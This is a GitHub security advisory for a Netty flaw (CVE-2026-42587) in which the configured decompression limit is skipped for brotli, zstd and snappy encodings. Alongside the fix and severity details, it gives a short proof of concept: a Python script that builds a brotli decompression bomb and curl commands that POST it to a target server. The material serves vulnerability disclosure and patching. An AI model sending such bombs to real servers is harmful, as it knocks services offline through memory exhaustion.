Skip to content

Netty: HttpContentDecompressor maxAllocation bypass when Content-Encoding set to br/zstd/snappy leads to decompression bomb DoS

High severity GitHub Reviewed Published May 5, 2026 in netty/netty • Updated May 7, 2026

Package

maven io.netty:netty-codec-http (Maven)

Affected versions

>= 4.2.0.Alpha1, <= 4.2.12.Final
<= 4.1.132.Final

Patched versions

4.2.13.Final
4.1.133.Final
maven io.netty:netty-codec-http2 (Maven)
>= 4.2.0.Alpha1, <= 4.2.12.Final
<= 4.1.132.Final
4.2.13.Final
4.1.133.Final

Description

Summary

HttpContentDecompressor accepts a maxAllocation parameter to limit decompression buffer size and prevent decompression bomb attacks. This limit is correctly enforced for gzip and deflate encodings via ZlibDecoder, but is silently ignored when the content encoding is br (Brotli), zstd, or snappy. An attacker can bypass the configured decompression limit by sending a compressed payload with Content-Encoding: br instead of Content-Encoding: gzip, causing unbounded memory allocation and out-of-memory denial of service.

The same vulnerability exists in DelegatingDecompressorFrameListener for HTTP/2 connections.

Details

HttpContentDecompressor stores the maxAllocation value at construction time (HttpContentDecompressor.java:89) and uses it in newContentDecoder() to create the appropriate decompression handler.

For gzip/deflate, maxAllocation is forwarded to ZlibCodecFactory.newZlibDecoder():

// HttpContentDecompressor.java:101 — maxAllocation IS enforced
.handlers(ZlibCodecFactory.newZlibDecoder(ZlibWrapper.GZIP, maxAllocation))

ZlibDecoder.prepareDecompressBuffer() enforces this as a hard cap by setting the buffer's maxCapacity and throwing DecompressionException when the limit is reached:

// ZlibDecoder.java:68 — hard limit on buffer capacity
return ctx.alloc().heapBuffer(Math.min(preferredSize, maxAllocation), maxAllocation);
// ZlibDecoder.java:80 — throws when exceeded
throw new DecompressionException("Decompression buffer has reached maximum size: " + buffer.maxCapacity());

For brotli, zstd, and snappy, the decoders are created without any size limit:

// HttpContentDecompressor.java:120 — maxAllocation IGNORED
.handlers(new BrotliDecoder())

// HttpContentDecompressor.java:129 — maxAllocation IGNORED
.handlers(new SnappyFrameDecoder())

// HttpContentDecompressor.java:138 — maxAllocation IGNORED
.handlers(new ZstdDecoder())

BrotliDecoder has no maxAllocation parameter at all — there is no way to constrain its output. It streams decompressed data in chunks via fireChannelRead with no total limit.

ZstdDecoder() defaults to a 4MB maximumAllocationSize, but this only constrains individual buffer allocations, not total output. The decode loop (ZstdDecoder.java:100-114) creates new buffers and fires channelRead repeatedly, so total decompressed output is unbounded.

The identical pattern exists in DelegatingDecompressorFrameListener.newContentDecompressor() at lines 188-210 for HTTP/2.

PoC

  1. Configure a Netty HTTP server with decompression bomb protection:
pipeline.addLast(new HttpContentDecompressor(1048576)); // 1MB max
pipeline.addLast(new HttpObjectAggregator(1048576));     // 1MB max
  1. Generate a brotli-compressed bomb (~1KB compressed → 1GB decompressed):
import brotli
bomb = b'\x00' * (1024 * 1024 * 1024)  # 1GB of zeros
compressed = brotli.compress(bomb, quality=11)
with open('bomb.br', 'wb') as f:
    f.write(compressed)
# compressed size: ~1KB
  1. Send the bomb with gzip encoding (BLOCKED by maxAllocation):
# This is caught — ZlibDecoder enforces the 1MB limit
curl -X POST http://target:8080/api \
  -H 'Content-Encoding: gzip' \
  --data-binary @bomb.gz
# Result: DecompressionException thrown at 1MB
  1. Send the same bomb with brotli encoding (BYPASSES maxAllocation):
# This bypasses the limit — BrotliDecoder has no maxAllocation
curl -X POST http://target:8080/api \
  -H 'Content-Encoding: br' \
  --data-binary @bomb.br
# Result: Full 1GB decompressed into memory → OOM
  1. The same bypass works with Content-Encoding: zstd and Content-Encoding: snappy.

Impact

  • Denial of Service: An attacker can cause out-of-memory conditions on any Netty server that relies on maxAllocation for decompression bomb protection, by simply using a non-gzip content encoding.
  • False sense of security: Developers who explicitly configure maxAllocation to protect against decompression bombs are not actually protected for brotli, zstd, or snappy encodings. The API documentation implies all encodings are covered.
  • Trivial bypass: The attacker only needs to change one HTTP header (Content-Encoding: br instead of Content-Encoding: gzip) to circumvent the protection entirely.
  • Both HTTP/1.1 and HTTP/2: The vulnerability exists in both HttpContentDecompressor (HTTP/1.1) and DelegatingDecompressorFrameListener (HTTP/2).

Recommended Fix

Pass maxAllocation to all decoder constructors. For BrotliDecoder, which currently has no maxAllocation support, add the parameter:

HttpContentDecompressor.java — pass maxAllocation to all decoders:

// Line 120: BrotliDecoder — add maxAllocation support
.handlers(new BrotliDecoder(maxAllocation))

// Line 129: SnappyFrameDecoder — add maxAllocation support
.handlers(new SnappyFrameDecoder(maxAllocation))

// Line 138: ZstdDecoder — forward the configured maxAllocation
.handlers(new ZstdDecoder(maxAllocation))

DelegatingDecompressorFrameListener.java — same fix at lines 188-210.

BrotliDecoder — add maxAllocation parameter with the same semantics as ZlibDecoder.prepareDecompressBuffer(): set buffer maxCapacity and throw DecompressionException when the total decompressed output exceeds the limit.

SnappyFrameDecoder — add maxAllocation parameter with equivalent enforcement.

ZstdDecoder — ensure that when maxAllocation is set, total output across all buffers is bounded (not just per-buffer allocation size).

References

@chrisvest chrisvest published to netty/netty May 5, 2026
Published to the GitHub Advisory Database May 7, 2026
Reviewed May 7, 2026
Last updated May 7, 2026

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

EPSS score

Weaknesses

Uncontrolled Resource Consumption

The product does not properly control the allocation and maintenance of a limited resource. Learn more on MITRE.

CVE ID

CVE-2026-42587

GHSA ID

GHSA-f6hv-jmp6-3vwv

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.